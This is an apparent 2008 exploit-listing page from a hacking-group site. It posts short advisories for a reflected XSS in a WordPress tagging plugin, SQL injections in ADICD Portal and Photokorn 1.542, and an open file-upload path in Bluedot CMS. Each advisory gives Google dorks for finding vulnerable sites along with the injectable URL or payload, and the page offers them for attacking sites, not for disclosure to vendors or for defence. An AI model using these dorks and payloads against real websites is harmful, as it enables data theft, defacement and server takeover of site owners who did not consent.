exploits

WordPress Simple Tagging Plugin Cross Site Scripting Vulnerability (XSS)

Submitted by kernel_panic on Fri, 09/05/2008 - 16:34

Remote PHP/ASP flaws

[ WordPress Simple Tagging Widget Cross Site Scripting Vulnerability (XSS) ]

[x] Script | www.herewithme.fr/wordpress-plugins

[x] Author | kernel_panic
[x] Site | codebomb.org
[x] Date | 5 Sept 2008

[+] D0rk | Try to find your own using Google. The vulnerable sites
are: www.site.com/?tag=[XSS] or www.site.com/folder/?tag=[XSS]

[+] 3xpl0it | http://site.com/?tag=[XSS]
e.g.: [XSS]: <script>alert(/XSS/)</script> or try to use others
in order to work

p0c :

ADICD Portal Remote Sql Injection

Submitted by tanZo0n on Mon, 09/01/2008 - 16:53

Remote PHP/ASP flaws

-+===#===#===#===#===#===#===#===#===#===#===+- -+===# ADICD Portal Remote Sql Injection #===+- -+===#===#===#===#===#===#===#===#===#===#===+-


[x] Author  | t@nzo0n
[x] Site    | codebomb.org
[x] Date    | 17 June 2008
[+] D0rk 1    |  Powered by ADICD 
[+] D0rk 2    |  Powered by ADICD + inurl:/shop.php?cid= 
[+] D0rk 3    |  Powered by ADICD + inurl:/product.detail.php 
[+] D0rk 4    |  Powered by ADICD + inurl:shop.php?pid=
[+] D0rk 5    |  Powered by ADICD + inurl:news_details.php?news_id=



  Login to post comments
Read more




  Photokorn 1.542 Remote Sql Injection

  
      Submitted by tanZo0n on Mon, 09/01/2008 - 16:49
  
      Remote PHP/ASP flaws

    

  
    -+===#===#===#===#===#===#===#===#===#===#===#===+-
-+===#  Photokorn 1.542 Remote Sql Injection #===+-
-+===#===#===#===#===#===#===#===#===#===#===#===+-

[x] Author  | t@nzo0n
[x] Site    | codebomb.org
[x] Date    | 18 June 2008
[x] Version | 1.542
[+] D0rk 1    |  Powered by photokorn + inurl:index.php?action=
[+] D0rk 2    |  intext:photokorn 1.542 + inurl:cat=
[+] D0rk 3    |  intext:photokorn 1.542 + inurl:pic=
[+] 3xpl0it   | www.site.com/[path]/index.php?action=showpic&cat=22&pic=[SQL]
  


  Login to post comments
Read more




  Bluedot CMS Remote File Upload Vulnerability

  
      Submitted by zolt on Mon, 09/01/2008 - 16:16
  
      Remote PHP/ASP flaws

    

  
    -+===#===#===#===#===#===#===#===#===#===#===#====#===#===+-
-+===# Bluedot CMS Remote File Upload Vulnerability   #===+-
-+===#===#===#===#===#===#===#===#===#===#===#====#===#===+-
 [x] Author  | Codebomb Team
 [x] Site    | codebomb.org
 [x] Date    | 3 July 2008
 [+] D0rk    | "created by Micronet - powered by Bluedot" 

 Vulnerable path: http://www.site.com/bluedot/DefaultPages/upload.asp
 Files are uploaded to http://www.site.com/upload/
 [x] Greetz  | Friends :)
  

  Login to post comments

 


  Navigation

  Home
exploits
Recent posts